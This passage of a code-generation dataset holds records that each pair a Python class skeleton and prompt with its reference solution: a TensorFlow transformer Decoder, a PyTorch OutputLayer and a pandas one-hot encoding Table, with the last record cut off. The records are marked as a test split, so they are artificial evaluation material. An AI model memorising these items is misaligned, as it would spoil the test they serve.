1)] = block1\nattention_weights['decoder_layer{}_block2'.format(i + 1)] = block2\nreturn (x, attention_weights)"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self.N = N\n self.dm = dm\n self.embedding = tf.keras.layers.Embedding(target_vocab, dm)\n self.positional_encoding = positional_encoding(max_seq_len, dm)\n self.blocks = [DecoderBlock(dm, h, hidden, drop_rate) for _ in range(N)]\n self.dropout = tf.keras.layers.Dropout(drop_rate)\n<|end_body_0|>\n\n<|body_start_1|>\n seq_len = tf.shape(x)[1]\n attention_weights = {}\n x = self.embedding(x)\n x *= tf.math.sqrt(tf.cast(self.dm, tf.float32))\n x += self.positional_encoding[:, :seq_len, :]\n x = self.dropout(x, training=training)\n for i in range(self.N):\n x, block1, block2 = self.blocks[i](x, encoder_output, training, look_ahead_mask, padding_mask)\n attention_weights['decoder_layer{}_block1'.format(i + 1)] = block1\n attention_weights['decoder_layer{}_block2'.format(i + 1)] = block2\n return (x, attention_weights)\n<|end_body_1|>\n", "class_docstring": "class Decoder", "class_name": "Decoder", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Decoder:\n \"\"\"class Decoder\"\"\"\n\n def __init__(self, N, dm, h, hidden, target_vocab, max_seq_len, drop_rate=0.1):\n \"\"\"* N - the number of blocks in the encoder * dm - the dimensionality of the model * h - the number of heads * hidden - the number of hidden units in the fully connected layer * target_vocab - the size of the target vocabulary * max_seq_len - the maximum sequence length possible * drop_rate - the dropout rate Sets the following public instance attributes: * N - the number of blocks in the encoder * 
dm - the dimensionality of the model * embedding - the embedding layer for the targets * positional_encoding - a numpy.ndarray of shape (max_seq_len, dm) containing the positional encodings * blocks - a list of length N containing all of the DecoderBlock‘s * dropout - the dropout layer, to be applie\"\"\"\n <|body_0|>\n\n def call(self, x, encoder_output, training, look_ahead_mask, padding_mask):\n \"\"\"* x - a tensor of shape (batch, target_seq_len, dm)containing the input to the decoder * encoder_output - a tensor of shape (batch, input_seq_len, dm) containing the output of the encoder * training - a boolean to determine if the model is training * look_ahead_mask - the mask to be applied to the first multi head attention layer * padding_mask - the mask to be applied to the second multi head attention layer Returns: a tensor of shape (batch, target_seq_len, dm) containing the decoder output\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.N = N\n self.dm = dm\n self.embedding = tf.keras.layers.Embedding(target_vocab, dm)\n self.positional_encoding = positional_encoding(max_seq_len, dm)\n self.blocks = [DecoderBlock(dm, h, hidden, drop_rate) for _ in range(N)]\n self.dropout = tf.keras.layers.Dropout(drop_rate)\n<|end_body_0|>\n\n<|body_start_1|>\n seq_len = tf.shape(x)[1]\n attention_weights = {}\n x = self.embedding(x)\n x *= tf.math.sqrt(tf.cast(self.dm, tf.float32))\n x += self.positional_encoding[:, :seq_len, :]\n x = self.dropout(x, training=training)\n for i in range(self.N):\n x, block1, block2 = self.blocks[i](x, encoder_output, training, look_ahead_mask, padding_mask)\n attention_weights['decoder_layer{}_block1'.format(i + 1)] = block1\n attention_weights['decoder_layer{}_block2'.format(i + 1)] = block2\n return (x, attention_weights)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000445", "length_bytes": 18002, "license_type": "no_license", "methods": [{"docstring": "* N - the number of blocks in the encoder * dm - the dimensionality of the model * h - the number of heads * hidden - the number of hidden units in the fully connected layer * target_vocab - the size of the target vocabulary * max_seq_len - the maximum sequence length possible * drop_rate - the dropout rate Sets the following public instance attributes: * N - the number of blocks in the encoder * dm - the dimensionality of the model * embedding - the embedding layer for the targets * positional_encoding - a numpy.ndarray of shape (max_seq_len, dm) containing the positional encodings * blocks - a list of length N containing all of the DecoderBlock‘s * dropout - the dropout layer, to be applie", "name": "__init__", "signature": "def __init__(self, N, dm, h, hidden, target_vocab, max_seq_len, drop_rate=0.1)"}, {"docstring": "* x - a tensor of shape (batch, target_seq_len, dm)containing the input to the decoder * encoder_output - a tensor of shape (batch, input_seq_len, dm) containing the output of the encoder * training - a boolean to determine if the model is training * look_ahead_mask - the mask to be applied to the first multi head attention layer * padding_mask - the mask to be applied to the second multi head attention layer Returns: a tensor of shape (batch, target_seq_len, dm) containing the decoder output", "name": "call", "signature": "def call(self, x, encoder_output, training, look_ahead_mask, padding_mask)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000616", "prompt": "Implement the Python class `Decoder` described below.\n\nClass 
description:\nclass Decoder\n\nMethod signatures and docstrings:\n- def __init__(self, N, dm, h, hidden, target_vocab, max_seq_len, drop_rate=0.1): * N - the number of blocks in the encoder * dm - the dimensionality of the model * h - the number of heads * hidden - the number of hidden units in the fully connected layer * target_vocab - the size of the target vocabulary * max_seq_len - the maximum sequence length possible * drop_rate - the dropout rate Sets the following public instance attributes: * N - the number of blocks in the encoder * dm - the dimensionality of the model * embedding - the embedding layer for the targets * positional_encoding - a numpy.ndarray of shape (max_seq_len, dm) containing the positional encodings * blocks - a list of length N containing all of the DecoderBlock‘s * dropout - the dropout layer, to be applie\n- def call(self, x, encoder_output, training, look_ahead_mask, padding_mask): * x - a tensor of shape (batch, target_seq_len, dm)containing the input to the decoder * encoder_output - a tensor of shape (batch, input_seq_len, dm) containing the output of the encoder * training - a boolean to determine if the model is training * look_ahead_mask - the mask to be applied to the first multi head attention layer * padding_mask - the mask to be applied to the second multi head attention layer Returns: a tensor of shape (batch, target_seq_len, dm) containing the decoder output", "prompted_full_text": "Implement the Python class `Decoder` described below.\n\nClass description:\nclass Decoder\n\nMethod signatures and docstrings:\n- def __init__(self, N, dm, h, hidden, target_vocab, max_seq_len, drop_rate=0.1): * N - the number of blocks in the encoder * dm - the dimensionality of the model * h - the number of heads * hidden - the number of hidden units in the fully connected layer * target_vocab - the size of the target vocabulary * max_seq_len - the maximum sequence length possible * drop_rate - the dropout rate Sets the following public instance attributes: * N - the number of blocks in the encoder * dm - the dimensionality of the model * embedding - the embedding layer for the targets * positional_encoding - a numpy.ndarray of shape (max_seq_len, dm) containing the positional encodings * blocks - a list of length N containing all of the DecoderBlock‘s * dropout - the dropout layer, to be applie\n- def call(self, x, encoder_output, training, look_ahead_mask, padding_mask): * x - a tensor of shape (batch, target_seq_len, dm)containing the input to the decoder * encoder_output - a tensor of shape (batch, input_seq_len, dm) containing the output of the encoder * training - a boolean to determine if the model is training * look_ahead_mask - the mask to be applied to the first multi head attention layer * padding_mask - the mask to be applied to the second multi head attention layer Returns: a tensor of shape (batch, target_seq_len, dm) containing the decoder output\n\n<|skeleton|>\nclass Decoder:\n \"\"\"class Decoder\"\"\"\n\n def __init__(self, N, dm, h, hidden, target_vocab, max_seq_len, drop_rate=0.1):\n \"\"\"* N - the number of blocks in the encoder * dm - the dimensionality of the model * h - the number of heads * hidden - the number of hidden units in the fully connected layer * target_vocab - the size of the target vocabulary * max_seq_len - the maximum sequence length possible * drop_rate - the dropout rate Sets the following public instance attributes: * N - the number of blocks in the encoder * dm - the dimensionality of the model * embedding - the 
embedding layer for the targets * positional_encoding - a numpy.ndarray of shape (max_seq_len, dm) containing the positional encodings * blocks - a list of length N containing all of the DecoderBlock‘s * dropout - the dropout layer, to be applie\"\"\"\n <|body_0|>\n\n def call(self, x, encoder_output, training, look_ahead_mask, padding_mask):\n \"\"\"* x - a tensor of shape (batch, target_seq_len, dm)containing the input to the decoder * encoder_output - a tensor of shape (batch, input_seq_len, dm) containing the output of the encoder * training - a boolean to determine if the model is training * look_ahead_mask - the mask to be applied to the first multi head attention layer * padding_mask - the mask to be applied to the second multi head attention layer Returns: a tensor of shape (batch, target_seq_len, dm) containing the decoder output\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.N = N\n self.dm = dm\n self.embedding = tf.keras.layers.Embedding(target_vocab, dm)\n self.positional_encoding = positional_encoding(max_seq_len, dm)\n self.blocks = [DecoderBlock(dm, h, hidden, drop_rate) for _ in range(N)]\n self.dropout = tf.keras.layers.Dropout(drop_rate)\n<|end_body_0|>\n\n<|body_start_1|>\n seq_len = tf.shape(x)[1]\n attention_weights = {}\n x = self.embedding(x)\n x *= tf.math.sqrt(tf.cast(self.dm, tf.float32))\n x += self.positional_encoding[:, :seq_len, :]\n x = self.dropout(x, training=training)\n for i in range(self.N):\n x, block1, block2 = self.blocks[i](x, encoder_output, training, look_ahead_mask, padding_mask)\n attention_weights['decoder_layer{}_block1'.format(i + 1)] = block1\n attention_weights['decoder_layer{}_block2'.format(i + 1)] = block2\n return (x, attention_weights)\n<|end_body_1|>\n", "revision_id": "8ad4c2594ff78b345dbd92e9d54d2a143ac4071a", "skeleton": "<|skeleton|>\nclass Decoder:\n \"\"\"class Decoder\"\"\"\n\n def __init__(self, N, dm, h, hidden, target_vocab, max_seq_len, drop_rate=0.1):\n \"\"\"* N - the number of blocks in the encoder * dm - the dimensionality of the model * h - the number of heads * hidden - the number of hidden units in the fully connected layer * target_vocab - the size of the target vocabulary * max_seq_len - the maximum sequence length possible * drop_rate - the dropout rate Sets the following public instance attributes: * N - the number of blocks in the encoder * dm - the dimensionality of the model * embedding - the embedding layer for the targets * positional_encoding - a numpy.ndarray of shape (max_seq_len, dm) containing the positional encodings * blocks - a list of length N containing all of the DecoderBlock‘s * dropout - the dropout layer, to be applie\"\"\"\n <|body_0|>\n\n def call(self, x, encoder_output, training, look_ahead_mask, padding_mask):\n \"\"\"* x - a tensor of shape (batch, target_seq_len, dm)containing the input to the decoder * encoder_output - a tensor of shape (batch, input_seq_len, dm) containing the output of the encoder * training - a boolean to determine if the model is training * look_ahead_mask - the mask to be applied to the first multi head attention layer * padding_mask - the mask to be applied to the second multi head attention layer Returns: a tensor of shape (batch, target_seq_len, dm) containing the decoder output\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Decoder:\n \"\"\"class Decoder\"\"\"\n\n def __init__(self, N, dm, h, hidden, 
target_vocab, max_seq_len, drop_rate=0.1):\n \"\"\"* N - the number of blocks in the encoder * dm - the dimensionality of the model * h - the number of heads * hidden - the number of hidden units in the fully connected layer * target_vocab - the size of the target vocabulary * max_seq_len - the maximum sequence length possible * drop_rate - the dropout rate Sets the following public instance attributes: * N - the number of blocks in the encoder * dm - the dimensionality of the model * embedding - the embedding layer for the targets * positional_encoding - a numpy.ndarray of shape (max_seq_len, dm) containing the positional encodings * blocks - a list of length N containing all of the DecoderBlock‘s * dropout - the dropout layer, to be applie\"\"\"\n super().__init__()\n self.N = N\n self.dm = dm\n self.embedding = tf.keras.layers.Embedding(target_vocab, dm)\n self.positional_encoding = positional_encoding(max_seq_len, dm)\n self.blocks = [DecoderBlock(dm, h, hidden, drop_rate) for _ in range(N)]\n self.dropout = tf.keras.layers.Dropout(drop_rate)\n\n def call(self, x, encoder_output, training, look_ahead_mask, padding_mask):\n \"\"\"* x - a tensor of shape (batch, target_seq_len, dm)containing the input to the decoder * encoder_output - a tensor of shape (batch, input_seq_len, dm) containing the output of the encoder * training - a boolean to determine if the model is training * look_ahead_mask - the mask to be applied to the first multi head attention layer * padding_mask - the mask to be applied to the second multi head attention layer Returns: a tensor of shape (batch, target_seq_len, dm) containing the decoder output\"\"\"\n seq_len = tf.shape(x)[1]\n attention_weights = {}\n x = self.embedding(x)\n x *= tf.math.sqrt(tf.cast(self.dm, tf.float32))\n x += self.positional_encoding[:, :seq_len, :]\n x = self.dropout(x, training=training)\n for i in range(self.N):\n x, block1, block2 = self.blocks[i](x, encoder_output, training, look_ahead_mask, padding_mask)\n attention_weights['decoder_layer{}_block1'.format(i + 1)] = block1\n attention_weights['decoder_layer{}_block2'.format(i + 1)] = block2\n return (x, attention_weights)\n", "source": "the_stack_v2_python_sparse", "source_path": "supervised_learning/0x12-transformer_apps/5-transformer.py", "source_repo": "jorgezafra94/holbertonschool-machine_learning", "split": "test", "star_events_count": 1} {"blob_id": "88000392ff7ed945a764d5d379e590379727bad8", "bodies": ["super().__init__()\nself.hid_dim = hid_dim\nself.seq_cont_dim = seq_cont_dim\nself.non_seq_cont_dim = non_seq_cont_dim\nself.emb_seq_num_classes = emb_seq_num_classes\nself.emb_non_seq_num_classes = emb_non_seq_num_classes\nself.has_non_seq = len(self.emb_non_seq_num_classes) > 0 or self.non_seq_cont_dim\nself.linear_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_seq_num_classes])\nself.linear_seq_cont = nn.Linear(hid_dim, seq_cont_dim) if seq_cont_dim else None\nself.linear_non_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_non_seq_num_classes])\nself.linear_non_seq_cont = nn.Linear(hid_dim, non_seq_cont_dim) if non_seq_cont_dim else None", "decoder_output_seq = decoder_output[:, :-1, :] if self.has_non_seq else decoder_output\ndecoder_output_non_seq = decoder_output[:, -1, :] if self.has_non_seq else None\ndevice = decoder_output.device\nseq_cat = [output_layer(decoder_output_seq) for output_layer in self.linear_seq_cat]\nseq_cont = self.linear_seq_cont(decoder_output_seq) if self.linear_seq_cont else torch.empty((0, 0), 
device=device)\nnon_seq_cat = [output_layer(decoder_output_non_seq) for output_layer in self.linear_non_seq_cat]\nnon_seq_cont = self.linear_non_seq_cont(decoder_output_non_seq) if self.linear_non_seq_cont else torch.empty((0, 0), device=device)\nreturn (seq_cat, seq_cont, non_seq_cat, non_seq_cont)"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self.hid_dim = hid_dim\n self.seq_cont_dim = seq_cont_dim\n self.non_seq_cont_dim = non_seq_cont_dim\n self.emb_seq_num_classes = emb_seq_num_classes\n self.emb_non_seq_num_classes = emb_non_seq_num_classes\n self.has_non_seq = len(self.emb_non_seq_num_classes) > 0 or self.non_seq_cont_dim\n self.linear_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_seq_num_classes])\n self.linear_seq_cont = nn.Linear(hid_dim, seq_cont_dim) if seq_cont_dim else None\n self.linear_non_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_non_seq_num_classes])\n self.linear_non_seq_cont = nn.Linear(hid_dim, non_seq_cont_dim) if non_seq_cont_dim else None\n<|end_body_0|>\n\n<|body_start_1|>\n decoder_output_seq = decoder_output[:, :-1, :] if self.has_non_seq else decoder_output\n decoder_output_non_seq = decoder_output[:, -1, :] if self.has_non_seq else None\n device = decoder_output.device\n seq_cat = [output_layer(decoder_output_seq) for output_layer in self.linear_seq_cat]\n seq_cont = self.linear_seq_cont(decoder_output_seq) if self.linear_seq_cont else torch.empty((0, 0), device=device)\n non_seq_cat = [output_layer(decoder_output_non_seq) for output_layer in self.linear_non_seq_cat]\n non_seq_cont = self.linear_non_seq_cont(decoder_output_non_seq) if self.linear_non_seq_cont else torch.empty((0, 0), device=device)\n return (seq_cat, seq_cont, non_seq_cat, non_seq_cont)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "OutputLayer", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass OutputLayer:\n\n def __init__(self, hid_dim, seq_cont_dim, non_seq_cont_dim, emb_seq_num_classes, emb_non_seq_num_classes):\n \"\"\"Initialize model with params.\"\"\"\n <|body_0|>\n\n def forward(self, decoder_output):\n \"\"\"Run a forward pass of model over the data.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.hid_dim = hid_dim\n self.seq_cont_dim = seq_cont_dim\n self.non_seq_cont_dim = non_seq_cont_dim\n self.emb_seq_num_classes = emb_seq_num_classes\n self.emb_non_seq_num_classes = emb_non_seq_num_classes\n self.has_non_seq = len(self.emb_non_seq_num_classes) > 0 or self.non_seq_cont_dim\n self.linear_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_seq_num_classes])\n self.linear_seq_cont = nn.Linear(hid_dim, seq_cont_dim) if seq_cont_dim else None\n self.linear_non_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_non_seq_num_classes])\n self.linear_non_seq_cont = nn.Linear(hid_dim, non_seq_cont_dim) if non_seq_cont_dim else None\n<|end_body_0|>\n\n<|body_start_1|>\n decoder_output_seq = decoder_output[:, :-1, :] if self.has_non_seq else decoder_output\n decoder_output_non_seq = decoder_output[:, -1, :] if self.has_non_seq else None\n device = decoder_output.device\n seq_cat = [output_layer(decoder_output_seq) for output_layer in self.linear_seq_cat]\n seq_cont = self.linear_seq_cont(decoder_output_seq) if self.linear_seq_cont else torch.empty((0, 0), device=device)\n non_seq_cat = [output_layer(decoder_output_non_seq) for output_layer in 
self.linear_non_seq_cat]\n non_seq_cont = self.linear_non_seq_cont(decoder_output_non_seq) if self.linear_non_seq_cont else torch.empty((0, 0), device=device)\n return (seq_cat, seq_cont, non_seq_cat, non_seq_cont)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000446", "length_bytes": 15906, "license_type": "permissive", "methods": [{"docstring": "Initialize model with params.", "name": "__init__", "signature": "def __init__(self, hid_dim, seq_cont_dim, non_seq_cont_dim, emb_seq_num_classes, emb_non_seq_num_classes)"}, {"docstring": "Run a forward pass of model over the data.", "name": "forward", "signature": "def forward(self, decoder_output)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_val_000030", "prompt": "Implement the Python class `OutputLayer` described below.\n\nClass description:\nImplement the OutputLayer class.\n\nMethod signatures and docstrings:\n- def __init__(self, hid_dim, seq_cont_dim, non_seq_cont_dim, emb_seq_num_classes, emb_non_seq_num_classes): Initialize model with params.\n- def forward(self, decoder_output): Run a forward pass of model over the data.", "prompted_full_text": "Implement the Python class `OutputLayer` described below.\n\nClass description:\nImplement the OutputLayer class.\n\nMethod signatures and docstrings:\n- def __init__(self, hid_dim, seq_cont_dim, non_seq_cont_dim, emb_seq_num_classes, emb_non_seq_num_classes): Initialize model with params.\n- def forward(self, decoder_output): Run a forward pass of model over the data.\n\n<|skeleton|>\nclass OutputLayer:\n\n def __init__(self, hid_dim, seq_cont_dim, non_seq_cont_dim, emb_seq_num_classes, emb_non_seq_num_classes):\n \"\"\"Initialize model with params.\"\"\"\n <|body_0|>\n\n def forward(self, decoder_output):\n \"\"\"Run a forward pass of model over the data.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.hid_dim = hid_dim\n self.seq_cont_dim = seq_cont_dim\n self.non_seq_cont_dim = non_seq_cont_dim\n self.emb_seq_num_classes = emb_seq_num_classes\n self.emb_non_seq_num_classes = emb_non_seq_num_classes\n self.has_non_seq = len(self.emb_non_seq_num_classes) > 0 or self.non_seq_cont_dim\n self.linear_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_seq_num_classes])\n self.linear_seq_cont = nn.Linear(hid_dim, seq_cont_dim) if seq_cont_dim else None\n self.linear_non_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_non_seq_num_classes])\n self.linear_non_seq_cont = nn.Linear(hid_dim, non_seq_cont_dim) if non_seq_cont_dim else None\n<|end_body_0|>\n\n<|body_start_1|>\n decoder_output_seq = decoder_output[:, :-1, :] if self.has_non_seq else decoder_output\n decoder_output_non_seq = decoder_output[:, -1, :] if self.has_non_seq else None\n device = decoder_output.device\n seq_cat = [output_layer(decoder_output_seq) for output_layer in self.linear_seq_cat]\n seq_cont = self.linear_seq_cont(decoder_output_seq) if self.linear_seq_cont else torch.empty((0, 0), device=device)\n non_seq_cat = [output_layer(decoder_output_non_seq) for output_layer in self.linear_non_seq_cat]\n non_seq_cont = self.linear_non_seq_cont(decoder_output_non_seq) if self.linear_non_seq_cont else torch.empty((0, 0), device=device)\n return (seq_cat, seq_cont, non_seq_cat, non_seq_cont)\n<|end_body_1|>\n", "revision_id": "9cdbf270487751a0ad6862b2fea2ccc0e23a0b67", "skeleton": "<|skeleton|>\nclass OutputLayer:\n\n def __init__(self, hid_dim, seq_cont_dim, non_seq_cont_dim, emb_seq_num_classes, 
emb_non_seq_num_classes):\n \"\"\"Initialize model with params.\"\"\"\n <|body_0|>\n\n def forward(self, decoder_output):\n \"\"\"Run a forward pass of model over the data.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class OutputLayer:\n def __init__(self, hid_dim, seq_cont_dim, non_seq_cont_dim, emb_seq_num_classes, emb_non_seq_num_classes):\n \"\"\"Initialize model with params.\"\"\"\n super().__init__()\n self.hid_dim = hid_dim\n self.seq_cont_dim = seq_cont_dim\n self.non_seq_cont_dim = non_seq_cont_dim\n self.emb_seq_num_classes = emb_seq_num_classes\n self.emb_non_seq_num_classes = emb_non_seq_num_classes\n self.has_non_seq = len(self.emb_non_seq_num_classes) > 0 or self.non_seq_cont_dim\n self.linear_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_seq_num_classes])\n self.linear_seq_cont = nn.Linear(hid_dim, seq_cont_dim) if seq_cont_dim else None\n self.linear_non_seq_cat = nn.ModuleList([nn.Linear(hid_dim, num_class) for num_class in emb_non_seq_num_classes])\n self.linear_non_seq_cont = nn.Linear(hid_dim, non_seq_cont_dim) if non_seq_cont_dim else None\n\n def forward(self, decoder_output):\n \"\"\"Run a forward pass of model over the data.\"\"\"\n decoder_output_seq = decoder_output[:, :-1, :] if self.has_non_seq else decoder_output\n decoder_output_non_seq = decoder_output[:, -1, :] if self.has_non_seq else None\n device = decoder_output.device\n seq_cat = [output_layer(decoder_output_seq) for output_layer in self.linear_seq_cat]\n seq_cont = self.linear_seq_cont(decoder_output_seq) if self.linear_seq_cont else torch.empty((0, 0), device=device)\n non_seq_cat = [output_layer(decoder_output_non_seq) for output_layer in self.linear_non_seq_cat]\n non_seq_cont = self.linear_non_seq_cont(decoder_output_non_seq) if self.linear_non_seq_cont else torch.empty((0, 0), device=device)\n return (seq_cat, seq_cont, non_seq_cat, non_seq_cont)\n", "source": "the_stack_v2_python_sparse", "source_path": "caspr/models/model_wrapper.py", "source_repo": "microsoft/CASPR", "split": "test", "star_events_count": 29} {"blob_id": "3252fc340b907aa0d154ff0aeceecba6cdd11b0b", "bodies": ["self.df = df\nself.table_list = []\nself.table_index = 0\nself.feature_list = feature_list\nself.prefix_list = prefix_list", "self.df[feature] = self.df[feature].astype('category')\nfeature_id = self.df[feature].cat.categories\nfeature_index = range(1, len(feature_id) + 1)\nif feature in ['policy', 'city']:\n feature_dict = dict(zip(feature_id, feature_id))\nelse:\n feature_dict = dict(zip(feature_id, feature_index))\nreturn feature_dict", "feature_dict = self.get_feature_dict(feature_name)\nindex_in_group = 1\nfor key, value in feature_dict.items():\n temp_dict = OrderedDict()\n temp_dict['id'] = feature_name + '_' + str(value)\n temp_dict['index'] = self.table_index\n temp_dict['debug_doc'] = prefix_str + key\n temp_dict['group'] = feature_name\n temp_dict['id_in_group'] = key\n temp_dict['index_in_group'] = index_in_group\n index_in_group += 1\n self.table_index += 1\n self.table_list.append(temp_dict)", "for feature_name, prefix_str in zip(self.feature_list, self.prefix_list):\n self.get_table_list(feature_name, prefix_str)\ntable_size = len(self.table_list)\ntable_dict = OrderedDict()\ntable_dict['size'] = table_size\ntable_dict['values'] = self.table_list\nwith open(path + 'format_table.json', 'w') as outfile:\n json.dump(table_dict, outfile, ensure_ascii=False)"], 
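
For reference, a minimal runnable sketch of the pandas categorical-to-index mapping that the get_feature_dict body in the Table record above relies on. This is an illustration only: the gender column and its values are assumptions, not values from the dataset.

import pandas as pd

# Hypothetical input: any DataFrame with a string-valued feature column.
df = pd.DataFrame({'gender': ['m', 'f', 'f', 'm', 'f']})

# Cast to the pandas 'category' dtype, then read off the sorted unique categories.
df['gender'] = df['gender'].astype('category')
feature_id = df['gender'].cat.categories  # Index(['f', 'm'], dtype='object')

# Map each category to a 1-based index, as get_feature_dict does for features
# other than 'policy' and 'city' (those two map each category to itself).
feature_index = range(1, len(feature_id) + 1)
feature_dict = dict(zip(feature_id, feature_index))
print(feature_dict)  # {'f': 1, 'm': 2}
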
"bodies_text": "<|body_start_0|>\n self.df = df\n self.table_list = []\n self.table_index = 0\n self.feature_list = feature_list\n self.prefix_list = prefix_list\n<|end_body_0|>\n\n<|body_start_1|>\n self.df[feature] = self.df[feature].astype('category')\n feature_id = self.df[feature].cat.categories\n feature_index = range(1, len(feature_id) + 1)\n if feature in ['policy', 'city']:\n feature_dict = dict(zip(feature_id, feature_id))\n else:\n feature_dict = dict(zip(feature_id, feature_index))\n return feature_dict\n<|end_body_1|>\n\n<|body_start_2|>\n feature_dict = self.get_feature_dict(feature_name)\n index_in_group = 1\n for key, value in feature_dict.items():\n temp_dict = OrderedDict()\n temp_dict['id'] = feature_name + '_' + str(value)\n temp_dict['index'] = self.table_index\n temp_dict['debug_doc'] = prefix_str + key\n temp_dict['group'] = feature_name\n temp_dict['id_in_group'] = key\n temp_dict['index_in_group'] = index_in_group\n index_in_group += 1\n self.table_index += 1\n self.table_list.append(temp_dict)\n<|end_body_2|>\n\n<|body_start_3|>\n for feature_name, prefix_str in zip(self.feature_list, self.prefix_list):\n self.get_table_list(feature_name, prefix_str)\n table_size = len(self.table_list)\n table_dict = OrderedDict()\n table_dict['size'] = table_size\n table_dict['values'] = self.table_list\n with open(path + 'format_table.json', 'w') as outfile:\n json.dump(table_dict, outfile, ensure_ascii=False)\n<|end_body_3|>\n", "class_docstring": "模型字段one-hot编码映射表", "class_name": "Table", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Table:\n \"\"\"模型字段one-hot编码映射表\"\"\"\n\n def __init__(self, df, feature_list, prefix_list):\n \"\"\":param df: :param feature_list: :param prefix_list:\"\"\"\n <|body_0|>\n\n def get_feature_dict(self, feature):\n \"\"\":param feature: :return:\"\"\"\n <|body_1|>\n\n def get_table_list(self, feature_name, prefix_str):\n \"\"\":param feature_name: :param prefix_str: :return:\"\"\"\n <|body_2|>\n\n def get_format_table(self, path):\n \"\"\":param path: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.df = df\n self.table_list = []\n self.table_index = 0\n self.feature_list = feature_list\n self.prefix_list = prefix_list\n<|end_body_0|>\n\n<|body_start_1|>\n self.df[feature] = self.df[feature].astype('category')\n feature_id = self.df[feature].cat.categories\n feature_index = range(1, len(feature_id) + 1)\n if feature in ['policy', 'city']:\n feature_dict = dict(zip(feature_id, feature_id))\n else:\n feature_dict = dict(zip(feature_id, feature_index))\n return feature_dict\n<|end_body_1|>\n\n<|body_start_2|>\n feature_dict = self.get_feature_dict(feature_name)\n index_in_group = 1\n for key, value in feature_dict.items():\n temp_dict = OrderedDict()\n temp_dict['id'] = feature_name + '_' + str(value)\n temp_dict['index'] = self.table_index\n temp_dict['debug_doc'] = prefix_str + key\n temp_dict['group'] = feature_name\n temp_dict['id_in_group'] = key\n temp_dict['index_in_group'] = index_in_group\n index_in_group += 1\n self.table_index += 1\n self.table_list.append(temp_dict)\n<|end_body_2|>\n\n<|body_start_3|>\n for feature_name, prefix_str in zip(self.feature_list, self.prefix_list):\n self.get_table_list(feature_name, prefix_str)\n table_size = len(self.table_list)\n table_dict = OrderedDict()\n table_dict['size'] = table_size\n table_dict['values'] = self.table_list\n with open(path + 'format_table.json', 'w') as outfile:\n json.dump(table_dict, 
outfile, ensure_ascii=False)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000447", "length_bytes": 2954, "license_type": "no_license", "methods": [{"docstring": ":param df: :param feature_list: :param prefix_list:", "name": "__init__", "signature": "def __init__(self, df, feature_list, prefix_list)"}, {"docstring": ":param feature: :return:", "name": "get_feature_dict", "signature": "def get_feature_dict(self, feature)"}, {"docstring": ":param feature_name: :param prefix_str: :return:", "name": "get_table_list", "signature": "def get_table_list(self, feature_name, prefix_str)"}, {"docstring": ":param path: :return:", "name": "get_format_table", "signature": "def get_format_table(self, path)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_val_000191", "prompt": "Implement the Python class `Table` described below.\n\nClass description:\n模型字段one-hot编码映射表\n\nMethod signatures and docstrings:\n- def __init__(self, df, feature_list, prefix_list): :param df: :param feature_list: :param prefix_list:\n- def get_feature_dict(self, feature): :param feature: :return:\n- def get_table_list(self, feature_name, prefix_str): :param feature_name: :param prefix_str: :return:\n- def get_format_table(self, path): :param path: :return:", "prompted_full_text": "Implement the Python class `Table` described below.\n\nClass description:\n模型字段one-hot编码映射表\n\nMethod signatures and docstrings:\n- def __init__(self, df, feature_list, prefix_list): :param df: :param feature_list: :param prefix_list:\n- def get_feature_dict(self, feature): :param feature: :return:\n- def get_table_list(self, feature_name, prefix_str): :param feature_name: :param prefix_str: :return:\n- def get_format_table(self, path): :param path: :return:\n\n<|skeleton|>\nclass Table:\n \"\"\"模型字段one-hot编码映射表\"\"\"\n\n def __init__(self, df, feature_list, prefix_list):\n \"\"\":param df: :param feature_list: :param prefix_list:\"\"\"\n <|body_0|>\n\n def get_feature_dict(self, feature):\n \"\"\":param feature: :return:\"\"\"\n <|body_1|>\n\n def get_table_list(self, feature_name, prefix_str):\n \"\"\":param feature_name: :param prefix_str: :return:\"\"\"\n <|body_2|>\n\n def get_format_table(self, path):\n \"\"\":param path: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.df = df\n self.table_list = []\n self.table_index = 0\n self.feature_list = feature_list\n self.prefix_list = prefix_list\n<|end_body_0|>\n\n<|body_start_1|>\n self.df[feature] = self.df[feature].astype('category')\n feature_id = self.df[feature].cat.categories\n 